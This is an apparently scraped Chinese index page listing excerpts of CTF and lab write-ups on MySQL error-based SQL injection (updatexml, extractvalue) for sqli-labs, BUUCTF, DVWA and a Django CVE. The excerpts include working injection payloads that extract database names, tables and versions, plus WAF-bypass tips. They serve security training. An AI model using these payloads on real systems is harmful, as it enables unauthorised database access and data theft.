ICode9

精准搜索请尝试: 精确搜索
  • Vulfocus靶场 | Django SQL注入(CVE-2021-35042)2022-08-20 23:02:50

    漏洞复现 这题通关比较简单,但是django这个漏洞还挺出名的,之前在ctf上也遇到过相关的题目\   直接按照提示,进入了Django报错页面   flag就在里面,直接ctrl+F就能找到     爆数据库版本 order=vuln_collection.id);select updatexml(1,concat(0x7e,(select @@version)),1)%

  • sqli-labs第5关updatexml报错注入2022-08-18 13:02:22

       这里选用的是第五关进行演示,首先根据页面提示输入?id=1页面返回的都是正常,输入?id=1'时,页面报错了,                 接着判断字段数,这里选择用?id=1 order by 1--+是不行的    这里选择用updatexml报错注入进行演示:注入之前,首先得明白updatexml函数的利用方式以

  • BUUCTF-[RCTF2015]EasySQL2022-07-26 18:35:19

    1、进去后是个登陆框,可以注册用户。首先这种猜测是二次注入,注册了admin’#用户,进去后有个改密码的操作,更加坚信了是个二次注入,但是并没有起到效果。 2、因为并不清楚sql语句的闭合方式,所以重新注册一个admin"#,登陆后也没有起到作用。 3、注册admin\,登陆进去后修改密码,结果出

  • BUUCTF[极客大挑战 2019]HardSQL2022-07-22 23:01:32

    1、burpsuit抓包,跑一下fuzz   发现长度为736的都被过滤掉了 2、观察error界面,猜测应该是报错注入 先爆数据库名 1 admin'or(updatexml(1,concat(0x7e,database(),0x7e),1))#、0x7e代表~ 得到数据库名geek 3、爆表名 1 admin'or(updatexml(1,concat(0x7e,(select(table_name)

  • [极客大挑战 2019]HardSQL2022-07-17 00:00:35

    [极客大挑战 2019]HardSQL 先用一下常规payload 发现应该是被过滤了 用字典爆破发现这些字符的回显都是相同的 根据错误,猜测是报错注入,(这里不是很明白怎么看出是报错注入的),有会的师傅可以评论一下 然后我们尝试使用报错注入的payload: 1'or(updatexml(1,concat(0x7e,database(

  • sql注入2022-06-28 22:35:26

    报错注入 为什么需要报错注入? 在实际场景中,如果没有一个合适的数据返回点,而是仅仅带入sql数据库进行查询,就需要报错注入。 SELECT * FROM users WHERE id='$id' LIMIT 0,1正常进行绕过,但是在页面中没有数据回显,断定为报错注入 1, extractvalue and extractvalue(0x7e,concat(0x7

  • SQL-报错注入2022-05-16 13:35:35

    updatexml报错注入 updatexml (XML_document, XPath_string, new_value): 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,了解Xpath语法。 第三个参数:new_value,String格式,替换查找到的符合条件的数据 利用updatexm

  • Less-142022-03-26 09:34:46

    Less-14 POST - Double Injection - Single quotes- String -twist (POST单引号变形双注入)  1.判断是否存在注入 uname=1"&passwd=a&submit=Submit 错误回显 => 存在注入 2.判断参数类型 uname=1 or 1=1#&passwd=a&submit=Submit 无回显 uname=1" or 1=1#&passwd=a&submi

  • 安鸾靶场 宽字符注入02 靶场练习 详细过程及解决问题笔记2022-02-06 20:02:45

    题目 网站URL ECSHOP演示站 - Powered by ECShop 目录   笔记  过程 进入sql注入页面 问题 判断闭合符 sql注入下的模糊查询  right 语法爆字段值   笔记 对现在我来说难度其实不大,但题目考察的一些细节要求比较高。 首先把我遇到的问题 一 一 列出。(在下面解题的过程会

  • DVWA SQL Injection - 报错注入2022-01-30 14:32:13

    报错注入 我当前的理解,报错注入主要是用于无正常回显但是存在异常回显时;比如 SQL 语句执行正常时页面只给你弹出操作成功;但是执行失败时却会告知你失败的信息(通过提示框或者调试器中的注释输出等) 本篇报错注入的学习以 dvwa sql injection 为例,这个题正常回显与异常回显都有,本次我

  • Less-062022-01-09 18:02:48

    双引号绕过 ?id=1" order by 3--+ ?id=1" and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata limit 0,1),0x7e),1)--+     ?id=1" and updatexml(1,concat(0x7e,(select group_concat(table_name) from informat

  • pikachu通关2021-12-17 13:34:41

    密码爆破 1.1表单爆破 Burpsuite抓包直接爆 1.2验证码绕过(on server) 验证码在服务端只验证一次,那么手动输入验证码后再次爆 1.3验证码绕过(on client) 验证码只在客户端进行验证,并不会发送到服务端,所以抓包的时候直接把验证码去掉再爆 1.4绕过token防护 这里我就得向服务器获

  • WEB安全- SQL过滤字符后手工注入漏洞测试(第3题)2021-12-04 10:00:06

    前言 这是SQL注入的第十一篇,紧接着上次的靶场来打,也是上次靶场的最后一题,这题是三星难度,但是打完好像并没有我想象的那么难,题目链接:https://www.mozhe.cn/bug/detail/ZVBYR3I3eG9USnpIT0xqaDdtR09SQT09bW96aGUmozhe 正文 首先明确目标,这里说需要绕过,但是做完发现好像并不要,所以题

  • [极客大挑战 2019]HardSQL2021-11-12 21:33:56

    首先拿到题目,使用 ' 进行尝试,发现输出了错误信息,直接使用报错注入的方式尝试 在尝试的过程中发现过滤了=,这里我们可以使用like进行替换,然后就是正常的报错注入流程了 爆名 admin'or(extractvalue(1,concat(0x7e,(select(table_name)from(information_schema.tables)where(ta

  • buuctf:[极客大挑战 2019]HardSQL2021-11-06 10:34:24

    打开链接,直接手工尝试注入,发现将and,union,=等过滤掉了 尝试一波报错注入 ?username=1'or(updatexml(1,concat(0x7e,version(),0x7e),1))%23&password=1   发现存在报错注入,那么接下来查看当前数据库 ?username=1'or(updatexml(1,concat(0x7e,database(),0x7e),1))%23&password=1

  • Sqlilabs超详细通过教程(持续更新)2021-11-02 23:03:30

    一到四关主要是参数被包装的问题。一般用于尝试的语句 Ps:--+可以用#替换,url 提交过程中 Url 编码后的#为%23 and1=2--+ 'and1=2--+ "and1=2--+ )and1=2--+ ')and1=2--+ ")and1=2--+ "))and1=2--+ 图中显示的sql语句是我为了方便理解,修改了源代码显示出的 第一关: 页面正常,考虑

  • Mysql报错注入2021-10-29 15:31:13

    报错注入原理 floor() Rand() //随机函数 Floor() //取整函数 Count() //聚合函数 Group by key //分组语句 select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x floor(rand(0)*2))x  利用随机数取整次数报错   extractvalue() 函数

  • sqli-labs(11-20)2021-10-02 16:31:31

    less-11 本关还可以使用union联合查询注入和盲注 (1)使用burpsuite抓包,修改参数构造payload。 输入uname=admin' and 1=1--+&passwd=admin&submit=Submit      可以登录 (2)输入uname=admin' and 1=2--+&passwd=admin&submit=Submit       发现无法登录,说明注入有效,存在报错型

  • updatexml和extractvalue函数报错注入2021-09-29 21:05:38

     updatexml()函数报错注入 updatexml (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,了解Xpath语法。 第三个参数:new_value,String格式,替换查找到的符合条件的数据 理

  • updatexml和extractvalue函数2021-09-29 20:34:02

    updatexml()函数报错注入 理解就是updatexml函数有查询功能 并且会再xpath处查询。使用语法构造错误 查询的结果已报错的形式显示 ----- select * from articles where id = 1  查找 articles表中id=1的内容 可以省略成 select ----- 报出当前数据库的数据 select * from art

  • Sqli labs less 602021-09-26 17:32:33

    1.常规方法测试     2.根据错误信息判断闭合方式为")–+,并且为字符型注入    3.查看当前库 ?id=1") and updatexml(1,concat(0x7e,(database()),0x7e),1)--+    4.查看库下的所有表88IVGFZVAY ?id=1") and updatexml(1,concat(0x7e,(select group_concat(table_name) fr

  • MYSQL Bypass SafeDog2021-09-23 23:03:01

    环境详情 采用本地搭建的最新版安全狗,仅用于学习交流,请勿用于实际环境 本地安装参考:解决本地安装安全狗 phpstudy: 2021版 网站安全狗: Apache V4.0.30255 靶场: sqli-labs-less1 (字符型注入) 打开安全狗,防护措施拉满,防御sql注入的也拉满 接下来开始我们的绕过 通用 an

  • SQL注入显错注入-HEAD12021-09-10 14:04:21

    SQL注入显错注入-HEAD1 head注入 显错注入 数据库报错有很多种 有一些是致命的,有一些是简单报错 使用 update(目标xml内容,xml文档里的路径,更新的内容) updatexml(1,concat(0x7e,(select database())),1),1) >=0x是十六进制 (select database是一个子查询) 0x7e代表 ~号 16进制永远

  • sqli-labs:less-27 绕过过滤狗2021-09-04 16:03:45

    好狗好狗 百般尝试 最后的payload http://127.0.0.1/sqli/Less-27/?id=1%27and(updatexml(1,concat(0x7e,(database()),0x7e),1))and%271

  • MYSQL报错注入2021-08-31 22:00:13

      函数extractvalue(参数1,参数2)   使用条件:mysql版本5.1以上 有长度限制32位   参数1:XML文档,参数2:XPAT语句   用法: extractvalue(1,concat(0x7e,(select user()),0x7e))   ?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e)) -- -        函数:up

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有